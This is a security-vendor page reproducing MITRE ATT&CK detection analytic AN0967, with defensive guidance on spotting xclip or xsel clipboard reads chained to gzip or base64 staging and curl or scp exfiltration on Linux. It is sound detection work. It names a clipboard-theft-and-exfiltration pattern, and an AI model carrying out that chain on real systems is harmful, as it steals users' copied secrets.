AN0967: Analytic 0967
Detection of xclip or xsel access to clipboard buffers outside of user terminal context, especially when chained to staging (gzip, base64) or network exfiltration (curl, scp).
Analyst context for executives and security teams
This analytic matters because Linux clipboard access can expose copied secrets, commands, tokens, or operational data if clipboard tools are invoked outside a normal user terminal workflow. The business value is in validating whether SOC and incident response teams can distinguish legitimate desktop clipboard use from suspicious collection and staging behavior, especially when clipboard reads are followed by compression, encoding, or network transfer utilities.
Executive priority
Prioritize this as a Linux endpoint visibility and data-protection validation item. Leaders should ask whether high-value Linux workstations, administrator systems, and developer environments collect enough process and command context to prove whether clipboard access is normal user activity or potential data collection. It is most relevant to operational resilience, incident scoping, insider-risk review, and audit evidence around monitoring of sensitive administrative environments.
Technical view
For Linux platforms, validate monitoring around xclip and xsel execution when the process context is not an interactive user terminal. The supplied analytic highlights higher-risk chaining with staging tools such as gzip or base64 and network transfer tools such as curl or scp. SOC teams should review process lineage, parent process, session or TTY context, command-line arguments where available, and subsequent process/network activity. No ATT&CK tactic, related technique, or official detection logic was supplied, so implementation must be locally defined and tested against normal desktop and automation behavior.
Likely telemetry
- Linux process creation events for xclip and xsel
- Command-line arguments for clipboard, staging, and transfer utilities where collected
- Parent/child process lineage and session or TTY context
- User identity and host context for Linux endpoints
- File creation or pipe activity associated with gzip or base64 staging where available
Detection direction
- Baseline legitimate xclip and xsel use on Linux desktops and administrative workstations before alerting broadly.
- Prioritize alerts where clipboard access occurs outside an interactive terminal or expected desktop session context.
- Increase severity when xclip or xsel activity is closely followed by gzip, base64, curl, or scp execution by the same user or process chain.
- Tune for expected automation, accessibility tools, remote desktop workflows, and developer utilities to reduce false positives.
- Validate that endpoint telemetry preserves parent process, command line, user, and session context; without these fields, this analytic may be weak or noisy.
Mitigation priorities
- Confirm Linux endpoint logging coverage first, especially for systems used by administrators, engineers, or personnel handling sensitive data.
- Apply least-privilege and software governance so clipboard and transfer utilities are available only where operationally needed.
- Harden monitoring around outbound transfer paths and unusual command-line staging from user workstations.
- Use incident response playbooks that preserve process lineage, command history where available, user session details, and network evidence when suspicious clipboard access is observed.
- Review user awareness and handling procedures for copying sensitive credentials or operational data into clipboards on monitored Linux systems.
Analyst notes and limits
This object is a MITRE detection analytic, not a technique description. The useful signal is the combination of Linux clipboard utilities, non-terminal context, and nearby staging or network transfer behavior. There are no supplied relationships, aliases, labels, tactics, or official detection logic, so local telemetry quality and environmental baselining determine practical value.
The source fields do not provide ATT&CK tactics, related techniques, data sources, detection pseudocode, mitigations, impact claims, attribution, or evidence of active exploitation. Recommendations are limited to conservative defensive validation derived from the official description and Linux platform scope.
Analytic 0967
Detection of xclip or xsel access to clipboard buffers outside of user terminal context, especially when chained to staging (gzip, base64) or network exfiltration (curl, scp).
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
All related ATT&CK context
No relationships are available in the current normalized data for this object.
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates .
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | 1.0 | Current bundle | d35781e31502… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
-
[1]
mitre-attack AN0967Open source URL
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.